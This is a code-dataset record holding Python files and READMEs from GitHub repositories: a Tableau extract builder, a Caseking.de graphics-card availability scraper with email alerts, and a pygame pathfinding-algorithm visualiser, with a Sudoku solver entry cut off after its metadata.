da4c1f7f1d3b5553db497af15458bf6b9fb6dec6
|
refs/heads/master
| 2020-04-13T05:09:22.313663 | 2018-12-24T11:43:10 | 2018-12-24T11:43:10 | 162,983,143 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6049165725708008,
"alphanum_fraction": 0.6136962175369263,
"avg_line_length": 29.79729652404785,
"blob_id": "aee1b2d956eadb76b45ba6b973a2d6512653fa75",
"content_id": "ca223559d987285785336dfb8f492290f7250db1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2278,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 74,
"path": "/python/create_extract.py",
"repo_name": "TableauServerbyPackt/TableauSDKAndAPI",
"src_encoding": "UTF-8",
"text": "## import the libraries\nimport tableausdk.Extract as tde\nimport pandas as pd\nimport os\n\n## bring in a sample Graduate School Admissions datasets\nfile_name = \"http://www.ats.ucla.edu/stat/data/binary.csv\"\ndf = pd.read_csv(file_name)\ndf.head()\ndf.shape\n\n## create the extract name, but remove the extract if it already exists\nfname = \"example.tde\"\ntry: \n tdefile = tde.Extract(fname)\nexcept:\n os.system('del ' + fname)\n os.system('del DataExtract.log')\n tdefile = tde.Extract(fname)\n\n\n## define the table definition\ntableDef = tde.TableDefinition()\n\n## create a list of column names and types\ncolnames = df.columns\ncoltypes = df.dtypes\n\n## create a dict for the field maps\n## Caveat: I am not including all of the possibilities below\nfieldMap = {\n 'float64' : tde.Types.Type.DOUBLE,\n 'float32' : tde.Types.Type.DOUBLE,\n 'int64' : tde.Types.Type.DOUBLE,\n 'int32' : tde.Types.Type.DOUBLE,\n 'object': tde.Types.Type.DOUBLE,\n 'bool' : tde.Types.Type.DOUBLE\n}\n\n## for each column, add the appropriate info the Table Definition\nfor i in range(0, len(colnames)):\n cname = colnames[i]\n ctype = fieldMap.get(str(coltypes[i]))\n tableDef.addColumn(cname, ctype) \n\n\n## create the extract from the Table Definition\n## Super Hacky, but legible\n## for each row, add the data to the table\n## Again, not accounting for every type or errors\nwith tdefile as extract:\n table = extract.addTable(\"Extract\", tableDef)\n for r in range(0, df.shape[0]):\n row = tde.Row(tableDef)\n for c in range(0, len(coltypes)):\n if str(coltypes[c]) == 'float64':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'float32':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'int64':\n row.setDouble(c, df.iloc[r,c]) \n elif str(coltypes[c]) == 'int32':\n row.setDouble(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'object':\n row.setString(c, df.iloc[r,c])\n elif str(coltypes[c]) == 'bool':\n row.setBoolean(c, df.iloc[r,c])\n else:\n row.setNull(c)\n # insert the row\n table.insert(row)\n\n## close the file\ntdefile.close()"
}
] | 1 |
harnold8/projects
|
https://github.com/harnold8/projects
|
1d54fb45e05d8acb529a3eeb1c436f8323e4c213
|
7b9834e36091d7a44aa3c0b750ecd0b37bbdad4e
|
82527ac4ffe6da830e8edef16b3fe16cfabd0a07
|
refs/heads/main
| 2023-01-31T14:56:26.318402 | 2020-12-02T20:17:09 | 2020-12-02T20:17:09 | 301,434,748 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5967336893081665,
"alphanum_fraction": 0.6524288058280945,
"avg_line_length": 39.92982482910156,
"blob_id": "06b693229e0c21299df23c92bbeb28760b396259",
"content_id": "77c8e66ca511ddd84ad5a43fc204359cb048b61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2388,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 57,
"path": "/graphics_card_scraper/scraper.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport smtplib\r\nimport time\r\nfrom bs4 import BeautifulSoup\r\n\r\n#checks the availabilty of the graphics card for a specific URL on Caseking.de\r\ndef check_availability(URL):\r\n #my user agent\r\n headers = {\"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'}\r\n page = requests.get(URL, headers=headers)\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n #for the rtx3080 graphics card, this class contains the availability\r\n availability = soup.find(class_=\"frontend_plugins_index_delivery_informations\").get_text()\r\n return(availability)\r\n\r\n#sends an email with the buy link (URL)\r\ndef send_mail(URL):\r\n #gmail handling\r\n server = smtplib.SMTP('smtp.gmail.com',587)\r\n server.ehlo()\r\n server.starttls()\r\n server.ehlo()\r\n #login credentials (make sure to activate less secure apps or two fact auth)\r\n server.login('*yourmail*@gmail.com','*password*')\r\n #email text\r\n subject = 'RTX 3080 available'\r\n body = \"The link \"+ URL\r\n msg = f\"Subject: {subject}\\n\\n{body}\"\r\n server.sendmail(\r\n '*sender*@gmail.com',\r\n '*recipient*@gmail.com',\r\n msg\r\n )\r\n\r\n#pages to check, graphics card I wanted\r\nurls = ['https://www.caseking.de/asus-geforce-rtx-3080-rog-strix-o10g-10240-mb-gddr6x-gcas-399.html',\r\n 'https://www.caseking.de/gigabyte-aorus-geforce-rtx-3080-master-10g-10240-mb-gddr6x-gcgb-331.html',\r\n 'https://www.caseking.de/zotac-gaming-geforce-rtx-3080-amp-holo-10240-mb-gddr6x-gczt-166.html',\r\n 'https://www.caseking.de/msi-geforce-rtx-3080-gaming-x-trio-10g-10240-mb-gddr6x-gcmc-248.html',\r\n 'https://www.caseking.de/asus-geforce-rtx-3080-rog-strix-10g-10240-mb-gddr6x-gcas-400.html',\r\n 'https://www.caseking.de/zotac-gaming-geforce-rtx-3080-trinity-oc-10240-mb-gddr6x-gczt-167.html'\r\n ]\r\n\r\n#I just want one card\r\nfound_card = False\r\nwhile(not found_card):\r\n for url in urls:\r\n #unbekannt->unavailable, everything else means the item is available\r\n if check_availability(url)[0:9]!='unbekannt':\r\n send_mail(url)\r\n print('Card available: '+url+'\\n')\r\n found_card = True\r\n break\r\n else:\r\n print('No card available')\r\n #checking every 60 seconds until I find a card\r\n time.sleep(60)"
},
{
"alpha_fraction": 0.8004115223884583,
"alphanum_fraction": 0.8004115223884583,
"avg_line_length": 120.25,
"blob_id": "5f1b2b67277de32a25750413183113cc5e4a911a",
"content_id": "773cbd629eebc83bd077f5818b449ee956f80876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 266,
"num_lines": 4,
"path": "/graphics_card_scraper/ReadMe.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Scraper Script\nA scraper script I used at the launch of new graphics cards. Even though the demand for the product was higher than its availability, I managed to get a graphics card with the help of this script :)!\n\nThe script was designed specifically for the www.caseking.de graphics card section. You might want to alternate the scraping for other pages. As soon as the availability of the products changes, an email gets send to the desired recipient with the corresponding url.\n\n"
},
{
"alpha_fraction": 0.7936984300613403,
"alphanum_fraction": 0.7951987981796265,
"avg_line_length": 82.3125,
"blob_id": "045eb41a6d61a21127768b45cede6779a9add6ac",
"content_id": "91e194cacdc37eda1ff7188195a81725c88b7f52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1333,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 16,
"path": "/README.md",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "# Projects\n\n## Pathfinding Algorithms\nI implemented the A*, Dijkstra, Greedy Best First Search and the Breadth-First Search algorithm with a Pygame GUI. A more detailed README version can be found in its subfolder\n\nIn this example, the Dijkstra algorithm can be seen. The orange node depicts the start point, the turquoise node the end point and black nodes correspond to an obstacle. The algorithm proceeds through the grid and marks visited nodes in light blue. Finally, the shortest path between the two nodes is highlighted in yellow.\n\n\n\n## Sudoku Solver\nFor this project I implemented a Sudoku solver (for a 9x9 grid) with a non-recursive Backtracking algorithm (in C++ and Python). The plan is to extend this project in the future, by reading Sudokus with text recognition (OCR) into the data structure.\n\n## Scraper Script\nA scraper script I used at the launch of new graphics cards. Even though the demand for the product was higher than its availability, I managed to get a graphics card with the help of this script :)!\n\nThe script was designed specifically for the www.caseking.de graphics card section. You might want to alternate the scraping for other pages. As soon as the availability of the products changes, an email gets send to the desired recipient with the corresponding url.\n"
},
{
"alpha_fraction": 0.6107487678527832,
"alphanum_fraction": 0.6311635971069336,
"avg_line_length": 26.87759017944336,
"blob_id": "c701ba57e5031ad2e321ea1b5b1ce8b072d88a8f",
"content_id": "2ef0b5e1b5bacb69e3c473a5dbe3e66ee155a6d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15332,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 531,
"path": "/pathfinding_algorithms/path_algos.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
"text": "import pygame\r\nimport math\r\nfrom queue import PriorityQueue\r\n\r\nWIDTH = 800\r\nWIN = pygame.display.set_mode((WIDTH+180, WIDTH))\r\npygame.display.set_caption(\"Search Algorithms\")\r\n\r\n#some color codes\r\nRED = (28, 103, 193)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 255, 0)\r\nYELLOW = (255, 255, 0)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (128, 0, 128)\r\nORANGE = (255, 165 ,0)\r\nGREY = (128, 128, 128)\r\nTURQUOISE = (64, 224, 208)\r\nEFFECTCOLOR = (97, 159, 232)\r\n\r\n\r\n\r\n#node structure for the grid (x,y). every node is connected with maximum 4 neighbors. stored in neighbors\r\n#diagonal connections are not allowed.\r\n#a spot also holds a color for the visualization\r\nclass Spot:\r\n\tdef __init__(self, row, col, width, total_rows):\r\n\t\tself.row = row\r\n\t\tself.col = col\r\n\t\tself.x = row * width\r\n\t\tself.y = col * width\r\n\t\t#unaccessed color = white\r\n\t\tself.color = WHITE\r\n\t\tself.neighbors = []\r\n\t\tself.width = width\r\n\t\tself.total_rows = total_rows\r\n\t\t#the color might changes after a certain step interval\r\n\t\tself.time_effekt = 0\r\n\r\n\tdef get_pos(self):\r\n\t\treturn self.row, self.col\r\n\r\n\tdef is_closed(self):\r\n\t\treturn self.color == RED\r\n\r\n\tdef is_open(self):\r\n\t\treturn self.color == GREEN\r\n\r\n\tdef is_barrier(self):\r\n\t\treturn self.color == BLACK\r\n\r\n\tdef is_start(self):\r\n\t\treturn self.color == ORANGE\r\n\r\n\tdef is_end(self):\r\n\t\treturn self.color == TURQUOISE\r\n\r\n\tdef reset(self):\r\n\t\tself.color = WHITE\r\n\r\n\tdef make_start(self):\r\n\t\tself.color = ORANGE\r\n\r\n\t#after 7 steps, change the color\r\n\tdef make_closed(self):\r\n\t\tself.color = RED\r\n\t\tself.time_effekt = 7\r\n\r\n\tdef make_open(self):\r\n\t\tself.color = GREEN\r\n\r\n\tdef make_barrier(self):\r\n\t\tself.color = BLACK\r\n\r\n\tdef check_barrier(self):\r\n\t\tif self.color == BLACK:\r\n\t\t\treturn True\r\n\r\n\tdef make_end(self):\r\n\t\tself.color = TURQUOISE\r\n\r\n\tdef make_path(self):\r\n\t\tself.color = YELLOW\r\n\r\n\tdef draw(self, win):\r\n\t\t#change the color after a certain step interval\r\n\t\tif self.time_effekt > 0 and self.is_closed():\r\n\t\t\tpygame.draw.rect(win, EFFECTCOLOR, (self.x, self.y, self.width, self.width))\r\n\t\t\tself.time_effekt += -1\r\n\t\telse:\r\n\t\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\r\n\r\n\t#assigns all the possible neighbors (max:D,U,R,L), barriers for example are not allowed to be a neighbor\r\n\tdef update_neighbors(self, grid):\r\n\t\tself.neighbors = []\r\n\t\t# can still move down is not a barrier\r\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\r\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\r\n\t\t#(0,0) is the upper right corner\r\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\r\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\r\n\t\t# number of rows=number of columns\r\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # RIGHT\r\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\r\n\r\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\r\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\r\n\r\n\tdef __lt__(self, other):\r\n\t\treturn False\r\n\r\n#manhattan distance\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n#draws the shortest path for A*, Greedy BFS and 
DIJK\r\ndef reconstruct_path(came_from, start, current, draw):\r\n\twhile current in came_from:\r\n\t\tcurrent = came_from[current]\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_path()\r\n\t\tdraw()\r\n\r\n#draws the shortest path for bfs\r\ndef draw_path(draw, shortest_path, start, end):\r\n\tfor items in shortest_path:\r\n\t\tif items != start and items != end:\r\n\t\t\titems.color = YELLOW\r\n\tdraw()\r\n\r\n# finds shortest path between 2 nodes of a graph using BFS\r\ndef bfs(draw, grid, start, end):\r\n\t# keep track of explored nodes\r\n\texplored = []\r\n\t# keep track of all the paths to be checked\r\n\tqueue = [[start]]\r\n\r\n\t# keeps looping until all possible paths have been checked\r\n\twhile queue:\r\n\t\t# pop the first path from the queue\r\n\t\tpath = queue.pop(0)\r\n\t\t# get the last node from the path\r\n\t\tnode = path[len(path)-1]\r\n\r\n\t\tif node not in explored:\r\n\t\t\tneighbours = node.neighbors\r\n\t\t\t# go through all neighbour nodes and build a new path\r\n\t\t\t# if it was never visited, mark it for the visualization\r\n\t\t\tfor neighbour in neighbours:\r\n\t\t\t\tif neighbour.color == WHITE:\r\n\t\t\t\t\tneighbour.make_closed()\r\n\t\t\t\tnew_path = list(path)\r\n\t\t\t\t#append the new element to the existing path\r\n\t\t\t\tnew_path.append(neighbour)\r\n\t\t\t\tqueue.append(new_path)\r\n\r\n\t\t\t\tif neighbour == end:\r\n\t\t\t\t\t#return new_path\r\n\t\t\t\t\tdraw_path(draw, new_path, start, end)\r\n\t\t\t\t\treturn None\r\n\t\t\t# mark node as explored\r\n\t\t\texplored.append(node)\r\n\t\tdraw()\r\n\r\n\r\n#eucledian distance, was used for test purposes\r\ndef eucl(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn math.sqrt((x1 - x2)*(x1 - x2) + (y1 - y2)*(y1 - y2))\r\n\r\n#A* algo\r\ndef algorithm(draw, grid, start, end):\r\n\t#to get a tie braker for equal fs\r\n\tcount = 0\r\n\t#to get the min element\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\t#setting g and f scores to inf at the beginning, except for the start pos\r\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tg_score[start] = 0\r\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\t#manhattan dist\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\t#updating the g_score for the neighbors\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\t\t\t#if a neighbor has a new lower value, save the new val\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\t#manhattan dist + steps\r\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\treturn False\r\n\r\n#dij\r\ndef dijk(draw, grid, 
start, end):\r\n\t#to get a tie braker for equal fs\r\n\tcount = 0\r\n\t#to get the min element\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, count, start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tg_score[start] = 0\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\t\t#if a neighbor has a new lower val, save it\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\ttemp_g_score = g_score[current] + 1\r\n\t\t\tif temp_g_score < g_score[neighbor]:\r\n\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\tg_score[neighbor] = temp_g_score\r\n\t\t\t\tif neighbor not in open_set_hash:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\topen_set.put((g_score[neighbor], count, neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn False\r\n\r\n#Greedy best first search, with manhattan dist\r\ndef greedy(draw, grid, start, end):\r\n\t#to get the min element, x value as tie braker\r\n\topen_set = PriorityQueue()\r\n\topen_set.put((0, start.get_pos()[1], start))\r\n\t#dictionary to assign nodes to nodes to create the shortest path\r\n\tcame_from = {}\r\n\t#heuristic, manhattan dist\r\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\r\n\tf_score[start] = h(start.get_pos(), end.get_pos())\r\n\topen_set_hash = {start}\r\n\r\n\twhile not open_set.empty():\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.quit()\r\n\t\t#get the minimum val node\r\n\t\tcurrent = open_set.get()[2]\r\n\t\topen_set_hash.remove(current)\r\n\t\t#shortest path found\r\n\t\tif current == end:\r\n\t\t\treconstruct_path(came_from, start, end, draw)\r\n\t\t\tend.make_end()\r\n\t\t\treturn True\r\n\r\n\t\tfor neighbor in current.neighbors:\r\n\t\t\t\t#add neighbor to the stack, if it hasn't been visited yet\r\n\t\t\t\tif neighbor not in open_set_hash and not neighbor.is_closed():\r\n\t\t\t\t\t# calculate the heuristics for the neighbors\r\n\t\t\t\t\tf_score[neighbor] = h(neighbor.get_pos(), end.get_pos())\r\n\t\t\t\t\tif current != start:\r\n\t\t\t\t\t\tcame_from[neighbor] = current\r\n\t\t\t\t\topen_set.put((f_score[neighbor], neighbor.get_pos()[1], neighbor))\r\n\t\t\t\t\topen_set_hash.add(neighbor)\r\n\t\tdraw()\r\n\r\n\t\tif current != start:\r\n\t\t\tcurrent.make_closed()\r\n\r\n\treturn False\r\n\r\n#data structure for the grid\r\ndef make_grid(rows, width):\r\n\tgrid = []\r\n\t#how large a button is going to be\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\tgrid.append([])\r\n\t\tfor j in range(rows):\r\n\t\t\tspot = Spot(i, j, gap, rows)\r\n\t\t\tgrid[i].append(spot)\r\n\treturn grid\r\n\r\n#draw the grid lines\r\ndef draw_grid(win, rows, width):\r\n\tgap = width // rows\r\n\tfor i in range(rows):\r\n\t\t#drawing horizontal lines x1 y1 x2 y2\r\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\r\n\t\tfor j in range(rows+1):\r\n\t\t\t# drawing vert lines x1 y1 x2 y2\r\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\r\n\r\n#drawing a text at pos 
x,y\r\ndef draw_text(text, font, color, surface, x, y):\r\n\ttextobj = font.render(text, 1, color)\r\n\ttextrect = textobj.get_rect()\r\n\ttextrect.topleft = (x, y)\r\n\tsurface.blit(textobj, textrect)\r\n\r\n#drawing the buttons for the algo selection\r\ndef draw_button(win, rows, width, text, font, color, y):\r\n\tDARKBLUE = [0, 8, 78]\r\n\tLBLUE = [0, 19, 195]\r\n\trow_width = width / rows\r\n\t#outer rectangle\r\n\tpygame.draw.rect(win, DARKBLUE, (width + 2, y, row_width * 11, row_width * 3.5))\r\n\t#inner\r\n\tpygame.draw.rect(win, LBLUE, (width + 7, y+5, row_width * 11 - 10, row_width * 3.5 - 10))\r\n\ttextcolor = WHITE\r\n\t#if selected color = Yellow\r\n\tif color:\r\n\t\ttextcolor = YELLOW\r\n\tdraw_text(text, font, textcolor, win, width + 12, y+20)\r\n\r\n#a faster drawing algo for the search algorithms, to only update the grid structure\r\ndef draw(win, grid, rows, width):\r\n\tfor row in grid:\r\n\t\tfor spot in row:\r\n\t\t\t# drawing the rectangles\r\n\t\t\tspot.draw(win)\r\n\t# drawing the grid\r\n\tdraw_grid(win, rows, width)\r\n\tpygame.display.update()\r\n\r\n#drawing visualization with the menu\r\ndef draw2(win, grid, rows, width, colorMatrix):\r\n\t#initializing every window in white\r\n\twin.fill(WHITE)\r\n\tfor row in grid:\r\n\t\tfor spot in row:\r\n\t\t\t#drawing the rectangles\r\n\t\t\tspot.draw(win)\r\n\t#drawing the grid\r\n\tdraw_grid(win, rows, width)\r\n\t#selecting font\r\n\tpygame.font.init()\r\n\tfont = pygame.font.Font('freesansbold.ttf', 20)\r\n\r\n\t#drawing the left mouse icon\r\n\tmouseImg = pygame.image.load('mouse_button.png')\r\n\tscaled = pygame.transform.scale(mouseImg, (50, 60))\r\n\tWIN.blit(scaled, (width + 2, 0))\r\n\tdraw_text('draw/select', font, BLACK, win, width + 55, 30)\r\n\r\n\t#drawing the right mouse icon\r\n\tmouseImg = pygame.image.load('right_button.png')\r\n\tscaled = pygame.transform.scale(mouseImg, (50, 60))\r\n\tWIN.blit(scaled, (width + 2, 70))\r\n\tdraw_text('delete', font, BLACK, win, width + 55, 100)\r\n\r\n\t#the spacebar\r\n\tspacebar = pygame.image.load('spacebar.jpg')\r\n\tscaled = pygame.transform.scale(spacebar, (80, 30))\r\n\tWIN.blit(scaled, (width + 2, 150))\r\n\tdraw_text('run', font, BLACK, win, width + 90, 155)\r\n\r\n\t#key c\r\n\tkey_c = pygame.image.load('key_c.png')\r\n\tscaled = pygame.transform.scale(key_c, (50, 50))\r\n\tWIN.blit(scaled, (width + 2, 190))\r\n\tdraw_text('reset grid', font, BLACK, win, width + 55, 205)\r\n\r\n\t#drawing the buttons for the algo selection\r\n\tbuttonNames = [\"A*\", \"Greedy BFS\", \"DIJK\", \"BFS\"]\r\n\tbuttonPos = 250\r\n\tfor i,name in enumerate(buttonNames):\r\n\t\tdraw_button(win, rows, width, name, font, colorMatrix[i], buttonPos)\r\n\t\t#60 is the height of a button\r\n\t\tbuttonPos += 60\r\n\r\n\tpygame.display.update()\r\n\r\n\r\n\r\n#getting the node that we clicked at\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\treturn row, col\r\n\r\ndef main(win, width):\r\n\t#matrix for button selection\r\n\tcolorMatrix = [0, 0, 0, 0]\r\n\t#number of cubes/nodes\r\n\tROWS = 50\r\n\tgrid = make_grid(ROWS, width)\r\n\tstart = None\r\n\tend = None\r\n\trun = True\r\n\tdraw2(win, grid, ROWS, width, colorMatrix)\r\n\r\n\twhile run:\r\n\t\t#checking for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\trun = False\r\n\r\n\t\t\tif pygame.mouse.get_pressed()[0]: # LEFT\r\n\r\n\t\t\t\t#where we pressed\r\n\t\t\t\tpos = 
pygame.mouse.get_pos()\r\n\r\n\t\t\t\tlimits = grid[0][0].total_rows * grid[0][0].width\r\n\r\n\t\t\t\tif pos[0] > limits:\r\n\t\t\t\t\t#Button/Algo selection\r\n\t\t\t\t\t#resetting the value\r\n\t\t\t\t\tif 250 < pos[1] < 490:\r\n\t\t\t\t\t\tfor i in range(4):\r\n\t\t\t\t\t\t\tcolorMatrix[i] = 0\r\n\t\t\t\t\t#setting new value\r\n\t\t\t\t\tif 250 < pos[1] < 310:\r\n\t\t\t\t\t\t#A*\r\n\t\t\t\t\t\tcolorMatrix[0] = 1\r\n\t\t\t\t\telif 310 < pos[1] < 370:\r\n\t\t\t\t\t\t#Greedy\r\n\t\t\t\t\t\tcolorMatrix[1] = 1\r\n\t\t\t\t\telif 370 < pos[1] < 430:\r\n\t\t\t\t\t\t#DJK\r\n\t\t\t\t\t\tcolorMatrix[2] = 1\r\n\t\t\t\t\telif 430 < pos[1] < 490:\r\n\t\t\t\t\t\t# BFS\r\n\t\t\t\t\t\tcolorMatrix[3] = 1\r\n\t\t\t\t\tdraw2(win, grid, ROWS, width, colorMatrix)\r\n\t\t\t\t#A position within the grid was selected\r\n\t\t\t\telse:\r\n\t\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\t\tspot = grid[row][col]\r\n\t\t\t\t\t#assigning start node\r\n\t\t\t\t\tif not start and spot != end:\r\n\t\t\t\t\t\tstart = spot\r\n\t\t\t\t\t\tstart.make_start()\r\n\t\t\t\t\t#assigning end node\r\n\t\t\t\t\telif not end and spot != start:\r\n\t\t\t\t\t\tend = spot\r\n\t\t\t\t\t\tend.make_end()\r\n\t\t\t\t\t#drawing barriers\r\n\t\t\t\t\telif spot != end and spot != start:\r\n\t\t\t\t\t\tspot.make_barrier()\r\n\r\n\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\telif pygame.mouse.get_pressed()[2]: # RIGHT\r\n\t\t\t\tpos = pygame.mouse.get_pos()\r\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\r\n\t\t\t\tspot = grid[row][col]\r\n\t\t\t\t#delete nodes with a right click\r\n\t\t\t\tspot.reset()\r\n\t\t\t\tif spot == start:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\telif spot == end:\r\n\t\t\t\t\tend = None\r\n\r\n\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t#spacebar = run the algo\r\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\r\n\t\t\t\t\t#determine which algo was selected\r\n\t\t\t\t\tfor row in grid:\r\n\t\t\t\t\t\tfor spot in row:\r\n\t\t\t\t\t\t\tspot.update_neighbors(grid)\r\n\t\t\t\t\talgo = -1\r\n\t\t\t\t\tfor i,value in enumerate(colorMatrix):\r\n\t\t\t\t\t\tif value:\r\n\t\t\t\t\t\t\talgo = i\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\tif algo == 0:\r\n\t\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 1:\r\n\t\t\t\t\t\tgreedy(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 2:\r\n\t\t\t\t\t\tdijk(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telif algo == 3:\r\n\t\t\t\t\t\tbfs(lambda: draw(win, grid, ROWS, width), grid, start, end)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tNone\r\n\t\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\t\t\t\t\t#resetting the algo colors afterwards\r\n\t\t\t\t\tfor i in range(ROWS):\r\n\t\t\t\t\t\tfor j in range(ROWS):\r\n\t\t\t\t\t\t\tif not grid[i][j].is_barrier() and grid[i][j] != start and grid[i][j] != end:\r\n\t\t\t\t\t\t\t\tgrid[i][j].color = WHITE\r\n\r\n\t\t\t\t#deleting the grid on key press \"c\"\r\n\t\t\t\tif event.key == pygame.K_c:\r\n\t\t\t\t\tstart = None\r\n\t\t\t\t\tend = None\r\n\t\t\t\t\tgrid = make_grid(ROWS, width)\r\n\t\t\t\t\tdraw(win, grid, ROWS, width)\r\n\r\n\tpygame.quit()\r\n\r\nmain(WIN, WIDTH)"
},
{
"alpha_fraction": 0.4368287920951843,
"alphanum_fraction": 0.4810486435890198,
"avg_line_length": 31.680850982666016,
"blob_id": "9349e9a391528b5abdcbd38b86d3047440f43cef",
"content_id": "29ae54cb1d9453dc414783178d2ee45b962a8593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3166,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 94,
"path": "/sudoku_solver/sudoku.py",
"repo_name": "harnold8/projects",
"src_encoding": "UTF-8",
